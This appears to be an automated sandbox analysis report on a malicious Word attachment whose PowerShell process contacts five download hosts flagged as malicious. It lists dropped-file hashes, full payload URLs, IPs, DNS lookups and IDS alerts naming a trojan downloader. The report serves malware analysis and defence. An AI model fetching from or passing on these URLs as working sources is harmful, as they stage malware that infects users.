2920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:18101F97A92C0DD903C719BE9DA97088
SHA256:680B5835CDF3BBFAD2DA17F56E82CAC844748B6E8301E6E832BE10C9771F6B55
3168powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:620F0318517F70B148EDA15339331C30
SHA256:2F7AB8A08BDCCC345A4E14CCC4BD28352CB771CA04253836EA1D287305F1712A
2920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Untitled_attachment_20190122.doc.xml.LNKlnk
MD5:FA546F59FDBE023CC2A500DFD7CBBF85
SHA256:8AA936E6F63680E80351AE38BE2FE0474EDD1305067838A96EE05A5C1977C9D9
2920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:AF0BF5F4A930634AA8BFE01836A6011C
SHA256:83EFE5C6560EC9A7E735A2AA14EB2440D3BE81516C8B0F9698DB65BC32B82590
2920WINWORD.EXEC:\Users\admin\Desktop\~$titled_attachment_20190122.doc.xmlpgc
MD5:7675FD942A73588311E38CB8325ECA4F
SHA256:DA3662837F81AB5E02FB696D5EBAD9558203E467438C93CD32326869863A9224
3168powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247f23.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3168
powershell.exe
GET
404
216.15.213.103:80
http://blamdigital.com/dc2cDi0
US
xml
345 b
malicious
3168
powershell.exe
GET
404
213.202.100.12:80
http://documentation-contest.com/APy2PMrfdo
HR
xml
345 b
malicious
3168
powershell.exe
GET
404
164.138.208.39:80
http://jumesamedina.com/FKcXltRa
ES
xml
345 b
malicious
3168
powershell.exe
GET
404
45.252.248.16:80
http://mariposaplus.com/idyudJzd
VN
xml
345 b
malicious
3168
powershell.exe
GET
404
94.73.146.142:80
http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL
TR
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3168
powershell.exe
45.252.248.16:80
mariposaplus.com
AZDIGI Corporation
VN
malicious
3168
powershell.exe
216.15.213.103:80
blamdigital.com
CYBERCON, INC.
US
malicious
3168
powershell.exe
164.138.208.39:80
jumesamedina.com
Cyberneticos Hosting SL
ES
malicious
3168
powershell.exe
213.202.100.12:80
documentation-contest.com
ISKON INTERNET d.d. za informatiku i telekomunikacije
HR
malicious
3168
powershell.exe
94.73.146.142:80
enerjiiklimlendirme.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious

DNS requests

Domain
IP
Reputation
jumesamedina.com
  • 164.138.208.39
malicious
mariposaplus.com
  • 45.252.248.16
malicious
blamdigital.com
  • 216.15.213.103
malicious
documentation-contest.com
  • 213.202.100.12
malicious
enerjiiklimlendirme.com
  • 94.73.146.142
malicious

Threats

PID
Process
Class
Message
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3168
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info